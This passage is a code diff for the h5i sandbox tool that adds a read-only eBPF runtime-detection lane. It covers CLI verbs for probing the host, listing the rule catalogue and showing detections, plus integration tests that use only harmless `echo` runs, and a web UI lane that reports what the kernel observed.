+                        println!(
+                            "  detect       = {} {}",
+                            if d.usable { "yes" } else { "no" },
+                            style(
+                                "(observation only — `h5i box detect probe` for the detail)"
+                            )
+                            .dim()
+                        );
+                        if !d.usable && let Some(why) = &d.detail {
+                            println!("                 {}", style(why).dim());
+                        }
+                    }
                     println!();
                     for (claim, profile_net_deny) in [
                         (h5i_core::sandbox::IsolationClaim::Workspace, false),
@@ -1289,8 +1324,19 @@ pub fn run(action: BoxCommands) -> anyhow::Result<()> {
                     // Same as Probe: a capability report is a diagnostic —
                     // never serve it from the probe cache.
                     let report = h5i_core::sandbox::capabilities_report_fresh();
+                    // The runtime-detection lane is grafted on here rather than
+                    // added to `CapabilitiesReport` itself: that type lives in
+                    // `h5i-sandbox`, which is the *confinement* layer, and the
+                    // detector sits beside it rather than under it. A field
+                    // there would put an observability crate below the thing it
+                    // observes, for the sake of one JSON key.
+                    let detect = h5i_core::bpf::probe_host();
                     if json {
-                        println!("{}", serde_json::to_string_pretty(&report)?);
+                        let mut v = serde_json::to_value(&report)?;
+                        if let serde_json::Value::Object(ref mut map) = v {
+                            map.insert("runtime_detection".into(), serde_json::to_value(&detect)?);
+                        }
+                        println!("{}", serde_json::to_string_pretty(&v)?);
                     } else {
                         let yn = |b: bool| {
                             if b {
@@ -1344,6 +1390,21 @@ pub fn run(action: BoxCommands) -> anyhow::Result<()> {
                         println!(
                             "  strongest_tier   = {}",
                             style(report.strongest_tier).cyan().bold()
+                        );
+                        // Observation, not confinement, and printed as such so
+                        // nobody reads a `yes` here as a boundary.
+                        println!(
+                            "  runtime_detect   = {} {}",
+                            yn(detect.usable),
+                            style(if detect.usable {
+                                "(observation only; `h5i box detect probe` for detail)".to_string()
+                            } else {
+                                format!(
+                                    "({})",
+                                    detect.detail.as_deref().unwrap_or("unavailable")
+                                )
+                            })
+                            .dim()
                         );
                         println!();
                         for c in &report.claims {

--- a/src/cli/detect.rs
+++ b/src/cli/detect.rs
@@ -1,0 +1,353 @@
+//! `h5i box detect` — the runtime-detection lane, from the outside.
+//!
+//! Three verbs, each answering a question a reviewer actually asks:
+//!
+//! * `probe` — *can this machine watch a box at all?* And when it cannot, the
+//!   command that would change that. A security feature that reports
+//!   "unavailable" and stops is a security feature nobody turns on.
+//! * `rules` — *what does it look for?* The catalogue is data, not code paths,
+//!   so it can be read without reading Rust — and so the answer to "would it
+//!   have caught X" is checkable rather than assumed.
+//! * `show` — *what did it see in this box?* Folded across the box's receipts,
+//!   worst first.
+//!
+//! Every one of them is read-only. Nothing here loads a program, attaches
+//! anything, or changes a policy.
+
+use clap::Subcommand;
+use console::style;
+
+use h5i_core::bpf;
+use h5i_core::ui::LOOKING;
+
+#[derive(Subcommand)]
+pub enum DetectCommands {
+    /// What this host can do for runtime detection, and what to run if it
+    /// cannot.
+    Probe {
+        #[arg(long)]
+        json: bool,
+    },
+
+    /// The signature catalogue: every rule, its severity, and what it is for.
+    Rules {
+        /// Only this family (`net`, `secret`, `exec`, `priv`, `kernel`,
+        /// `mount`) or this exact rule id.
+        #[arg(long, value_name = "FAMILY|ID")]
+        filter: Option<String>,
+        #[arg(long)]
+        json: bool,
+    },
+
+    /// What the kernel observed in a box, across all of its receipts.
+    Show {
+        /// Box name or id.
+        name: String,
+        /// Only detections at this severity or above (`info`, `notice`,
+        /// `alert`).
+        #[arg(long, default_value = "info")]
+        min: String,
+        #[arg(long)]
+        json: bool,
+    },
+}
+
+pub fn run(action: DetectCommands) -> anyhow::Result<()> {
+    match action {
+        DetectCommands::Probe { json } => probe(json),
+        DetectCommands::Rules { filter, json } => rules(filter.as_deref(), json),
+        DetectCommands::Show { name, min, json } => show(&name, &min, json),
+    }
+}
+
+fn probe(json: bool) -> anyhow::Result<()> {
+    let caps = bpf::probe_host();
+    if json {
+        println!("{}", serde_json::to_string_pretty(&caps)?);
+        return Ok(());
+    }
+    println!("── Runtime detection (kernel-observed lane) ──");
+    println!("  os           = {}", caps.os);
+    println!(
+        "  kernel       = {}",
+        caps.kernel.as_deref().unwrap_or("(unknown)")
+    );
+    let yn = |b: bool| if b { "yes" } else { "no" };
+    println!(
+        "  ring buffer  = {}  (needs Linux {}.{}+)",
+        yn(caps.ringbuf),
+        bpf::probe::MIN_KERNEL.0,
+        bpf::probe::MIN_KERNEL.1
+    );
+    println!("  probe object = {}", yn(caps.object));
+    println!("  CAP_BPF      = {}", yn(caps.cap_bpf));
+    println!("  CAP_PERFMON  = {}", yn(caps.cap_perfmon));
+    // Both are reported and neither is required. They are here because anyone
+    // who has used another eBPF tool will ask, and "we do not need it" is a
+    // more useful answer than silence.
+    println!(
+        "  kernel BTF   = {}  {}",
+        yn(caps.kernel_btf),
+        style("(not required: this probe is CO-RE-free)").dim()
+    );
+    println!(
+        "  tracefs      = {}  {}",
+        yn(caps.tracefs),
+        style("(not required: it only lets h5i verify tracepoint offsets)").dim()
+    );
+    println!();
+    if caps.usable {
+        println!(
+            "{} this host can watch a box. Turn it on per profile:",
+            style("✓").green()
+        );
+        println!("      [profile.agent.detect]");
+        println!("      enabled = true");
+    } else {
+        println!(
+            "{} {}",
+            style("✗").red(),
+            caps.detail.as_deref().unwrap_or("unavailable")
+        );
+        if let Some(fix) = &caps.fix {
+            println!("\n  To enable it:\n      {fix}");
+            println!(
+                "\n  {}",
+                style(
+                    "h5i does not run that itself: granting a process capabilities is your \
+                     decision, not a tool's."
+                )
+                .dim()
+            );
+        }
+    }
+    Ok(())
+}
+
+fn rules(filter: Option<&str>, json: bool) -> anyhow::Result<()> {
+    let selected: Vec<&bpf::RuleSpec> = bpf::RULES
+        .iter()
+        .filter(|r| match filter {
+            None => true,
+            Some(f) => r.family == f || r.id == f,
+        })
+        .collect();
+
+    if selected.is_empty() {
+        anyhow::bail!(
+            "no rule or family matches `{}` — families are: {}",
+            filter.unwrap_or(""),
+            families().join(", ")
+        );
+    }
+
+    if json {
+        let rows: Vec<_> = selected
+            .iter()
+            .map(|r| {
+                serde_json::json!({
+                    "id": r.id,
+                    "family": r.family,
+                    "severity": r.severity.as_str(),
+                    "title": r.title,
+                    "detail": r.detail,
+                })
+            })
+            .collect();
+        println!("{}", serde_json::to_string_pretty(&rows)?);
+        return Ok(());
+    }
+
+    println!("── Runtime detection signatures ──\n");
+    let mut family = "";
+    for r in &selected {
+        if r.family != family {
+            family = r.family;
+            println!("{}", style(family).bold());
+        }
+        println!(
+            "  {:<24} {}  {}",
+            r.id,
+            severity_tag(r.severity),
+            style(r.title).dim()
+        );
+        println!("      {}", wrap(r.detail, 72, "      "));
+    }
+    println!(
+        "\n{}",
+        style(
+            "Every rule is observation only. Nothing here can deny a syscall — confinement is \
+             Landlock, seccomp, the network namespace and the egress proxy, and it stays there."
+        )
+        .dim()
+    );
+    Ok(())
+}
+
+fn show(name: &str, min: &str, json: bool) -> anyhow::Result<()> {
+    let min = parse_severity(min)?;
+    let repo = super::discover_repo("box detect show")?;
+    let h5i_root = h5i_core::storage::h5i_root_for_repo(&repo)?;
+    let m = h5i_core::env::find(&h5i_root, name)?;
+    let records = h5i_core::receipt::list(&m.dir(&h5i_root))?;
+
+    let watched: Vec<&h5i_core::receipt::ExecRecord> =
+        records.iter().filter(|r| r.runtime.is_some()).collect();
+
+    if json {
+        let rows: Vec<_> = watched
+            .iter()
+            .map(|r| {
+                serde_json::json!({
+                    "capture": r.id,
+                    "timestamp": r.timestamp,
+                    "cmd": r.cmd,
+                    "runtime": r.runtime,
+                })
+            })
+            .collect();
+        println!("{}", serde_json::to_string_pretty(&rows)?);
+        return Ok(());
+    }
+
+    if watched.is_empty() {
+        println!(
+            "{} no receipt in {} carries a runtime block.",
+            LOOKING, m.id
+        );
+        println!(
+            "  {}",
+            style(
+                "Nothing was watched — which is not the same as nothing happening. Enable it \
+                 with `[profile.<name>.detect] enabled = true` and check `h5i box detect probe`."
+            )
+            .dim()
+        );
+        return Ok(());
+    }
+
+    println!("── Runtime detection: {} ──\n", m.id);
+    let mut total = 0u64;
+    for r in &watched {
+        let rt = r.runtime.as_ref().expect("filtered above");
+        println!(
+            "{}  {}",
+            style(&r.timestamp).dim(),
+            h5i_core::redact::sanitize_display(r.cmd.as_deref().unwrap_or("(no command)"))
+        );
+        println!("    {}", h5i_core::redact::sanitize_display(&rt.summary()));
+        for d in rt.detections.iter().filter(|d| d.severity >= min) {
+            total += d.count;
+            println!(
+                "    {} {:<24} ×{}  {}",
+                severity_tag(d.severity),
+                d.rule,
+                d.count,
+                style(h5i_core::redact::sanitize_display(&d.title)).dim()
+            );
+            for ex in &d.examples {
+                println!("        · {}", h5i_core::redact::sanitize_display(ex));
+            }
+            if d.examples_truncated {
+                println!("        · {}", style("…").dim());
+            }
+        }
+        println!();
+    }
+    // "recorded" and "watched" are different numbers, and conflating them is
+    // the exact confusion this lane exists to remove: a run whose probe never
+    // attached is on the log and was not watched.
+    let observed = watched
+        .iter()
+        .filter(|r| r.runtime.as_ref().is_some_and(|rt| rt.observed()))
+        .count();
+    println!(
+        "{} run(s) asked to be watched, {} actually {}, {} matched event(s) at {} or above.",
+        watched.len(),
+        observed,
+        if observed == 1 { "was" } else { "were" },
+        total,
+        min.as_str()
+    );
+    // The sentence that keeps the number honest. An empty list means the
+    // signatures did not fire, and the signatures are a finite list.
+    println!(
+        "{}",
+        style("`h5i box detect rules` lists what was looked for; behaviour no rule models \
+               produces no line here.")
+        .dim()
+    );
+    Ok(())
+}
+
+fn families() -> Vec<&'static str> {
+    let mut f: Vec<&'static str> = bpf::RULES.iter().map(|r| r.family).collect();
+    f.sort_unstable();
+    f.dedup();
+    f
+}
+
+fn parse_severity(s: &str) -> anyhow::Result<bpf::Severity> {
+    match s.trim().to_lowercase().as_str() {
+        "info" => Ok(bpf::Severity::Info),
+        "notice" => Ok(bpf::Severity::Notice),
+        "alert" => Ok(bpf::Severity::Alert),
+        other => anyhow::bail!("unknown severity `{other}` (expected info, notice or alert)"),
+    }
+}
+
+fn severity_tag(s: bpf::Severity) -> String {
+    match s {
+        bpf::Severity::Alert => style("[alert] ").red().bold().to_string(),
+        bpf::Severity::Notice => style("[notice]").yellow().to_string(),
+        bpf::Severity::Info => style("[info]  ").dim().to_string(),
+    }
+}
+
+/// Wrap `text` to `width`, indenting continuation lines with `pad`.
+fn wrap(text: &str, width: usize, pad: &str) -> String {
+    let mut out = String::new();
+    let mut col = 0usize;
+    for word in text.split_whitespace() {
+        if col > 0 && col + 1 + word.len() > width {
+            out.push('\n');
+            out.push_str(pad);
+            col = 0;
+        } else if col > 0 {
+            out.push(' ');
+            col += 1;
+        }
+        out.push_str(word);
+        col += word.len();
+    }
+    out
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    #[test]
+    fn severities_parse_and_reject() {
+        assert_eq!(parse_severity("alert").unwrap(), bpf::Severity::Alert);
+        assert_eq!(parse_severity(" Notice ").unwrap(), bpf::Severity::Notice);
+        assert!(parse_severity("critical").is_err());
+    }
+
+    #[test]
+    fn every_family_is_reachable_by_name() {
+        for f in families() {
+            assert!(bpf::RULES.iter().any(|r| r.family == f));
+        }
+        assert!(families().contains(&"net"));
+    }
+
+    #[test]
+    fn wrapping_keeps_every_word() {
+        let text = "a much longer sentence than the width allows, wrapped";
+        let wrapped = wrap(text, 12, "  ");
+        let flat: Vec<&str> = wrapped.split_whitespace().collect();
+        assert_eq!(flat, text.split_whitespace().collect::<Vec<_>>());
+        assert!(wrapped.contains('\n'));
+    }
+}

--- a/src/cli/mod.rs
+++ b/src/cli/mod.rs
@@ -8,6 +8,11 @@
 pub mod boxes;
 pub mod browser;
 pub mod completion;
+// `h5i box detect`. Not feature-gated, deliberately: the verbs are how a user
+// finds out *why* a build cannot watch a box, and gating them behind the
+// feature that provides the collector would hide that answer from exactly the
+// builds that need it.
+pub mod detect;
 pub mod man;
 // `h5i box share` / `h5i join`. Gated with `share-tunnel`, the narrower of
 // the two switches, because the tunnel transport is what this module always

--- a/tests/detect_integration.rs
+++ b/tests/detect_integration.rs
@@ -1,0 +1,409 @@
+//! End-to-end tests for the runtime-detection lane (ROADMAP.md D1–D14).
+//!
+//! These drive the compiled binary against real repositories, and they prove
+//! the properties that hold **on every host** — including the overwhelmingly
+//! common one that has no `CAP_BPF` and therefore cannot attach a probe at
+//! all:
+//!
+//!   1. A profile that does not ask to be watched produces a receipt with no
+//!      runtime block. Absence means "did not ask", and nothing else.
+//!   2. A profile that *does* ask always produces a block, whether or not the
+//!      probe could attach — and when it could not, the block carries the
+//!      reason. This is the property the whole lane rests on: an unwatched run
+//!      must never be indistinguishable from a quiet one.
+//!   3. `require = true` refuses the run rather than performing it unwatched.
+//!   4. A `[detect]` section that reads as watching and would watch nothing is
+//!      refused at load, fail-closed, like every other policy lint here.
+//!   5. The verbs (`probe`, `rules`, `show`) work on any host, because the
+//!      first question a user has is "why is this not working", and a command
+//!      that only runs where the feature already works cannot answer it.
+//!
+//! What is *not* here is the actual attach: that needs `CAP_BPF`, which no CI
+//! runner grants, and it lives in `crates/h5i-bpf/tests/live_attach.rs` behind
+//! `H5I_BPF_LIVE=1`. Splitting them this way is deliberate — everything a
+//! host can check is checked everywhere, and the part that cannot be is
+//! isolated rather than skipped inside a suite that then reports "ok".
+
+use std::path::{Path, PathBuf};
+use std::process::{Command, Output};
+use tempfile::TempDir;
+
+const H5I: &str = env!("CARGO_BIN_EXE_h5i");
+
+fn run_ok(cmd: &mut Command) -> Output {
+    let out = cmd.output().expect("command failed to spawn");
+    assert!(
+        out.status.success(),
+        "command failed:\nstdout: {}\nstderr: {}",
+        String::from_utf8_lossy(&out.stdout),
+        String::from_utf8_lossy(&out.stderr),
+    );
+    out
+}
+
+fn git(dir: &Path, args: &[&str]) -> Output {
+    run_ok(Command::new("git").args(args).current_dir(dir))
+}
+
+fn out_str(out: &Output) -> String {
+    format!(
+        "{}{}",
+        String::from_utf8_lossy(&out.stdout),
+        String::from_utf8_lossy(&out.stderr)
+    )
+}
+
+struct Repo {
+    dir: PathBuf,
+    _root: TempDir,
+}
+
+impl Repo {
+    /// A repo whose `default` profile carries `policy`, committed.
+    fn with_policy(policy: &str) -> Repo {
+        let root = TempDir::new().expect("tempdir");
+        let dir = root.path().join("repo");
+        run_ok(Command::new("git").args(["init", "-b", "main"]).arg(&dir));
+        git(&dir, &["config", "user.name", "Detect Tester"]);
+        git(&dir, &["config", "user.email", "detect@h5i.test"]);
+        std::fs::write(dir.join("README.md"), "seed\n").unwrap();
+        std::fs::create_dir_all(dir.join(".h5i")).unwrap();
+        std::fs::write(dir.join(".h5i/env.toml"), policy).unwrap();
+        git(&dir, &["add", "."]);
+        git(&dir, &["commit", "-m", "seed"]);
+        Repo { dir, _root: root }
+    }
+
+    fn h5i(&self, args: &[&str]) -> Output {
+        Command::new(H5I)
+            .args(args)
+            .env("H5I_AGENT", "tester")
+            // The workspace tier so these tests run identically on a host with
+            // no Landlock: what is under test is the evidence lane, not the
+            // confinement.
+            .env("H5I_DEFAULT_ISOLATION", "workspace")
+            .current_dir(&self.dir)
+            .output()
+            .expect("h5i failed to spawn")
+    }
+
+    fn h5i_ok(&self, args: &[&str]) -> Output {
+        let out = self.h5i(args);
+        assert!(
+            out.status.success(),
+            "h5i {} failed:\n{}",
+            args.join(" "),
+            out_str(&out)
+        );
+        out
+    }
+
+    fn env_dir(&self, slug: &str) -> PathBuf {
+        self.dir.join(".git/.h5i/env/tester").join(slug)
+    }
+
+    fn last_receipt(&self, slug: &str) -> serde_json::Value {
+        let log = self.env_dir(slug).join("receipt.jsonl");
+        let blob = std::fs::read_to_string(&log)
+            .unwrap_or_else(|_| panic!("no receipt log at {}", log.display()));
+        let line = blob
+            .lines()
+            .rfind(|l| !l.trim().is_empty())
+            .expect("a receipt");
+        serde_json::from_str(line).expect("receipt json")
+    }
+}
+
+/// Does this host actually have the collector? Used only to sharpen an
+/// assertion, never to skip one — every test below asserts something on both
+/// kinds of host.
+fn collector_available() -> bool {
+    let out = Command::new(H5I)
+        .args(["box", "detect", "probe", "--json"])
+        .output()
+        .expect("detect probe");
+    serde_json::from_slice::<serde_json::Value>(&out.stdout)
+        .ok()
+        .and_then(|v| v["usable"].as_bool())
+        .unwrap_or(false)
+}
+
+// ── the block, and what its absence means ───────────────────────────────────
+
+/// No `[detect]` section, no block. An absent block must mean "this profile
+/// did not ask", so that a *present* one can carry a real answer.
+#[test]
+fn a_profile_that_does_not_ask_produces_no_runtime_block() {
+    let r = Repo::with_policy("[profile.default]\nisolation = \"workspace\"\n");
+    r.h5i_ok(&["env", "create", "quiet"]);
+    r.h5i_ok(&["env", "run", "quiet", "--", "echo", "hello"]);
+
+    let rec = r.last_receipt("quiet");
+    assert_eq!(rec["source"], "host-env-run");
+    assert!(
+        rec.get("runtime").is_none(),
+        "an unasked-for lane must not appear at all: {rec}"
+    );
+}
+
+/// The property the whole lane rests on. A profile that asked to be watched
+/// gets a block **either way**: with detections when the probe attached, with
+/// a reason when it could not. What must never happen is an empty block, or no
+/// block, on a run nobody watched — that reads exactly like a quiet box.
+#[test]
+fn a_run_that_asked_to_be_watched_always_carries_a_block() {
+    let r = Repo::with_policy(
+        "[profile.default]\nisolation = \"workspace\"\n\n[profile.default.detect]\nenabled = true\n",
+    );
+    r.h5i_ok(&["env", "create", "watched"]);
+    r.h5i_ok(&["env", "run", "watched", "--", "echo", "hello"]);
+
+    let rec = r.last_receipt("watched");
+    let rt = rec
+        .get("runtime")
+        .unwrap_or_else(|| panic!("a profile that asked must get a block: {rec}"));
+    assert_eq!(rt["lane"], "kernel-bpf");
+
+    if collector_available() {
+        assert!(
+            rt.get("unavailable").is_none(),
+            "the collector is available here, so the run should have been watched: {rt}"
+        );
+        assert_eq!(rt["coverage"], "full");
+    } else {
+        let why = rt["unavailable"]
+            .as_str()
+            .unwrap_or_else(|| panic!("an unwatched run must say why: {rt}"));
+        assert!(!why.is_empty());
+        assert_eq!(rt["coverage"], "none");
+        // And the detections list must be empty *and* explained — never empty
+        // and silent.
+        assert!(
+            rt.get("detections").is_none()
+                || rt["detections"].as_array().map(|a| a.is_empty()) == Some(true)
+        );
+    }
+}
+
+/// `require = true` means what it says: refuse the run rather than perform it
+/// unwatched. On a host that *can* watch, the same profile runs normally —
+/// the switch is about the failure, not about the feature.
+#[test]
+fn require_refuses_the_run_when_the_probe_cannot_attach() {
+    let r = Repo::with_policy(
+        "[profile.default]\nisolation = \"workspace\"\n\n\
+         [profile.default.detect]\nenabled = true\nrequire = true\n",
+    );
+    r.h5i_ok(&["env", "create", "strict"]);
+    let out = r.h5i(&["env", "run", "strict", "--", "echo", "hello"]);
+    let text = out_str(&out);
+
+    if collector_available() {
+        assert!(out.status.success(), "should have run and been watched:\n{text}");
+    } else {
+        assert!(
+            !out.status.success(),
+            "an unwatchable run under `require = true` must refuse:\n{text}"
+        );
+        assert!(
+            text.contains("require = true"),
+            "the refusal must name the setting that caused it:\n{text}"
+        );
+        // And it must be actionable: the reason the probe could not attach.
+        assert!(
+            text.contains("CAP_BPF") || text.contains("probe") || text.contains("kernel"),
+            "the refusal must carry the probe's own reason:\n{text}"
+        );
+    }
+}
+
+// ── fail-closed policy lints ────────────────────────────────────────────────
+
+/// `enabled = true` with `rules = []` reads as watching and watches nothing.
+/// Refused at load, like every other policy lint in this product.
+#[test]
+fn an_enabled_section_that_selects_nothing_is_refused() {
+    let r = Repo::with_policy(
+        "[profile.default]\nisolation = \"workspace\"\n\n\
+         [profile.default.detect]\nenabled = true\nrules = []\n",
+    );
+    let out = r.h5i(&["env", "create", "empty-rules"]);
+    let text = out_str(&out);
+    assert!(!out.status.success(), "should have refused:\n{text}");
+    assert!(text.contains("watches for nothing"), "{text}");
+}
+
+/// `require = true` with `enabled = false` reads as "refuse to run unwatched"
+/// and would in fact never watch. A policy that contradicts itself is refused
+/// rather than resolved in whichever direction the code happens to take.
+#[test]
+fn require_without_enabled_is_refused() {
+    let r = Repo::with_policy(
+        "[profile.default]\nisolation = \"workspace\"\n\n\
+         [profile.default.detect]\nrequire = true\n",
+    );
+    let out = r.h5i(&["env", "create", "contradictory"]);
+    let text = out_str(&out);
+    assert!(!out.status.success(), "should have refused:\n{text}");
+    assert!(text.contains("require = true"), "{text}");
+}
+
+/// A rule id nobody provides must stop the run reading as watched. The
+/// selector is checked by the collector, so this surfaces as a refusal to
+/// attach — with the typo named.
+#[test]
+fn a_misspelled_rule_makes_the_run_report_itself_unwatched() {
+    let r = Repo::with_policy(
+        "[profile.default]\nisolation = \"workspace\"\n\n\
+         [profile.default.detect]\nenabled = true\nrules = [\"net.direct-egres\"]\n",
+    );
+    r.h5i_ok(&["env", "create", "typo"]);
+    r.h5i_ok(&["env", "run", "typo", "--", "echo", "hello"]);
+
+    let rec = r.last_receipt("typo");
+    let rt = &rec["runtime"];
+    let why = rt["unavailable"].as_str().unwrap_or("");
+    assert!(
+        why.contains("net.direct-egres"),
+        "the receipt must name the selector that matched nothing: {rt}"
+    );
+}
+
+// ── the policy digest ───────────────────────────────────────────────────────
+
+/// Whether a box was watched is part of what its policy claimed, so it has to
+/// be inside the digest a reviewer compares two boxes by.
+#[test]
+fn enabling_detection_changes_the_pinned_policy_digest() {
+    let plain = Repo::with_policy("[profile.default]\nisolation = \"workspace\"\n");
+    plain.h5i_ok(&["env", "create", "a"]);
+    let d1 = std::fs::read_to_string(plain.env_dir("a").join("policy.resolved.toml")).unwrap();
+
+    let watched = Repo::with_policy(
+        "[profile.default]\nisolation = \"workspace\"\n\n[profile.default.detect]\nenabled = true\n",
+    );
+    watched.h5i_ok(&["env", "create", "b"]);
+    let d2 = std::fs::read_to_string(watched.env_dir("b").join("policy.resolved.toml")).unwrap();
+
+    assert!(d2.contains("[profile.detect]"), "{d2}");
+    assert!(!d1.contains("detect"), "an unwatched box's policy must be unchanged:\n{d1}");
+    assert_ne!(d1, d2);
+}
+
+// ── the verbs ───────────────────────────────────────────────────────────────
+
+/// `detect probe` has to work on the hosts that *cannot* run the collector,
+/// because those are the hosts whose users need to know why.
+#[test]
+fn probe_reports_the_host_and_names_a_fix_when_it_can() {
+    let out = run_ok(&mut {
+        let mut c = Command::new(H5I);
+        c.args(["box", "detect", "probe", "--json"]);
+        c
+    });
+    let v: serde_json::Value =
+        serde_json::from_slice(&out.stdout).expect("detect probe --json must be json");
+    assert!(v["os"].is_string());
+    if v["usable"] == serde_json::Value::Bool(false) {
+        assert!(
+            v["detail"].is_string(),
+            "an unusable host must say why: {v}"
+        );
+    }
+
+    // The human form must not be empty, and must not claim the feature works
+    // when it does not.
+    let human = out_str(&run_ok(&mut {
+        let mut c = Command::new(H5I);
+        c.args(["box", "detect", "probe"]);
+        c
+    }));
+    assert!(human.contains("Runtime detection"), "{human}");
+}
+
+/// The catalogue is the answer to "would it have caught X", so it has to be
+/// printable without a repository, a box, or a kernel.
+#[test]
+fn rules_prints_the_catalogue_and_filters_by_family() {
+    let all = out_str(&run_ok(&mut {
+        let mut c = Command::new(H5I);
+        c.args(["box", "detect", "rules", "--json"]);
+        c
+    }));
+    let rows: Vec<serde_json::Value> = serde_json::from_str(&all).expect("json");
+    assert!(rows.len() >= 15, "the catalogue looks truncated: {}", rows.len());
+    assert!(rows.iter().any(|r| r["id"] == "net.direct-egress"));
+    assert!(rows.iter().all(|r| r["detail"].as_str().is_some_and(|d| !d.is_empty())));
+
+    let net = out_str(&run_ok(&mut {
+        let mut c = Command::new(H5I);
+        c.args(["box", "detect", "rules", "--filter", "net", "--json"]);
+        c
+    }));
+    let net_rows: Vec<serde_json::Value> = serde_json::from_str(&net).expect("json");
+    assert!(net_rows.iter().all(|r| r["family"] == "net"));
+    assert!(net_rows.len() < rows.len());
+
+    // A filter that matches nothing is an error, not an empty list: an empty
+    // list reads as "no such rules exist".
+    let bogus = Command::new(H5I)
+        .args(["box", "detect", "rules", "--filter", "nonsense"])
+        .output()
+        .expect("spawn");
+    assert!(!bogus.status.success());
+}
+
+/// `detect show` on a box nobody watched must say so, not print nothing.
+#[test]
+fn show_says_nothing_was_watched_rather_than_printing_an_empty_list() {
+    let r = Repo::with_policy("[profile.default]\nisolation = \"workspace\"\n");
+    r.h5i_ok(&["env", "create", "unwatched"]);
+    r.h5i_ok(&["env", "run", "unwatched", "--", "echo", "hi"]);
+
+    let text = out_str(&r.h5i_ok(&["box", "detect", "show", "unwatched"]));
+    assert!(text.contains("no receipt"), "{text}");
+    assert!(text.contains("not the same as nothing happening"), "{text}");
+}
+
+/// And on a box that asked, it must render the block — including the
+/// unavailable one, which is the case a reader most needs to see.
+#[test]
+fn show_renders_a_block_that_could_not_be_collected() {
+    let r = Repo::with_policy(
+        "[profile.default]\nisolation = \"workspace\"\n\n[profile.default.detect]\nenabled = true\n",
+    );
+    r.h5i_ok(&["env", "create", "asked"]);
+    r.h5i_ok(&["env", "run", "asked", "--", "echo", "hi"]);
+
+    let text = out_str(&r.h5i_ok(&["box", "detect", "show", "asked"]));
+    assert!(text.contains("Runtime detection: env/tester/asked"), "{text}");
+    if !collector_available() {
+        assert!(text.contains("not observed"), "{text}");
+    }
+
+    let json = out_str(&r.h5i_ok(&["box", "detect", "show", "asked", "--json"]));
+    let rows: Vec<serde_json::Value> = serde_json::from_str(&json).expect("json");
+    assert_eq!(rows.len(), 1);
+    assert_eq!(rows[0]["runtime"]["lane"], "kernel-bpf");
+}
+
+// ── the status page ─────────────────────────────────────────────────────────
+
+/// `box status` must report whether the host can *deliver* what the profile
+/// asked for. A page that printed only the profile's intent would be the
+/// "reads like enforcement, enforces nothing" failure this product keeps
+/// finding in itself.
+#[test]
+fn status_says_whether_the_host_can_actually_watch() {
+    let r = Repo::with_policy(
+        "[profile.default]\nisolation = \"workspace\"\n\n[profile.default.detect]\nenabled = true\n",
+    );
+    r.h5i_ok(&["env", "create", "shown"]);
+    let text = out_str(&r.h5i_ok(&["box", "status", "shown"]));
+    assert!(text.contains("detect   :"), "{text}");
+    if collector_available() {
+        assert!(text.contains("kernel-observed"), "{text}");
+    } else {
+        assert!(text.contains("NOT watching on this host"), "{text}");
+    }
+}

--- a/web/src/SandboxView.tsx
+++ b/web/src/SandboxView.tsx
@@ -28,6 +28,7 @@ import {
   type ShareEvidence,
   type SharedNow,
   type Signals,
+  runtimeObserved,
   thirdPartyCanRead,
 } from "./api";
 
@@ -49,9 +50,12 @@ const LANES: { key: LaneKey; label: string; hint: string }[] = [
   { key: "proc", label: "PROC", hint: "process / exit status" },
   { key: "res", label: "RES", hint: "resource limits" },
   { key: "browser", label: "PAGE", hint: "what the in-box browser saw" },
+  // The kernel lane sits last because it is the newest and the narrowest, not
+  // because it is the weakest — it is the only column here a box cannot write.
+  { key: "kernel", label: "KERN", hint: "what an eBPF collector saw from the kernel" },
 ];
 
-type LaneKey = "fs" | "net" | "proc" | "res" | "browser";
+type LaneKey = "fs" | "net" | "proc" | "res" | "browser" | "kernel";
 
 const POLL_MS = 8000;
 
@@ -632,6 +636,9 @@ function SignalBadge({ signals }: { signals: Signals }) {
       signals.failed ? `${signals.failed} failed` : null,
       signals.timed_out ? `${signals.timed_out} timed out` : null,
       signals.browser_issues ? `${signals.browser_issues} page issue(s)` : null,
+      signals.kernel_alerts
+        ? `${signals.kernel_alerts} kernel alert(s): ${(signals.kernel_rules ?? []).join(", ")}`
+        : null,
     ].filter(Boolean);
     return (
       <span className="sbx-pressure warning" title={parts.join(", ")}>
@@ -900,6 +907,41 @@ function SignalSummary({ box }: { box: BoxRow }) {
       <Callout key="claimed" icon="eye-off" className="sbx-callout">
         Every receipt here came from the in-box tee shim — the box's own
         account. Nothing on this screen was observed from the host.
+      </Callout>,
+    );
+  }
+  if (s.kernel_alerts) {
+    notes.push(
+      <Callout key="kernel" icon="pulse" className="sbx-callout">
+        An eBPF collector in the kernel recorded {s.kernel_alerts} alert-level
+        match{s.kernel_alerts === 1 ? "" : "es"}
+        {s.kernel_rules?.length ? (
+          <>
+            {" "}
+            (<Code>{s.kernel_rules.join(", ")}</Code>)
+          </>
+        ) : null}
+        . Nothing was blocked — this lane observes and never denies. The
+        receipts below carry what tripped each rule.
+      </Callout>,
+    );
+  }
+  if (s.kernel_unwatched) {
+    notes.push(
+      <Callout key="kernel-off" icon="eye-off" className="sbx-callout">
+        {s.kernel_unwatched} run
+        {s.kernel_unwatched === 1 ? "" : "s"} asked to be watched from the
+        kernel and {s.kernel_unwatched === 1 ? "was" : "were"} not. Open the run
+        below for the reason. An unwatched run is not a quiet one.
+      </Callout>,
+    );
+  }
+  if (s.kernel_events_lost) {
+    notes.push(
+      <Callout key="kernel-lost" icon="warning-sign" className="sbx-callout">
+        {s.kernel_events_lost} kernel event
+        {s.kernel_events_lost === 1 ? "" : "s"} were dropped before anything
+        examined them, so every count from that lane is a lower bound.
       </Callout>,
     );
   }
@@ -1269,6 +1311,54 @@ function LaneVerdict({ lane, receipt }: { lane: LaneKey; receipt: ExecRecord }) 
         </span>
       );
     }
+    case "kernel": {
+      const rt = receipt.runtime;
+      // No block at all: this run did not ask to be watched. A dot, not a
+      // tick — a tick would claim a result nobody produced.
+      if (!rt) return <span className="sbx-verdict none">·</span>;
+      if (!runtimeObserved(rt))
+        return (
+          <span
+            className="sbx-verdict weak"
+            title={
+              rt.unavailable ??
+              rt.coverage_reason ??
+              "the collector observed nothing for this run"
+            }
+          >
+            ◌ none
+          </span>
+        );
+      const dets = rt.detections ?? [];
+      const alerts = dets.filter((d) => d.severity === "alert");
+      const lost = rt.events_lost
+        ? `\n${rt.events_lost} event(s) lost — this is a lower bound`
+        : "";
+      const partial =
+        rt.coverage === "partial"
+          ? `\npartial coverage: ${rt.coverage_reason ?? "some of the run was out of scope"}`
+          : "";
+      if (dets.length === 0)
+        return (
+          <span
+            className="sbx-verdict ok"
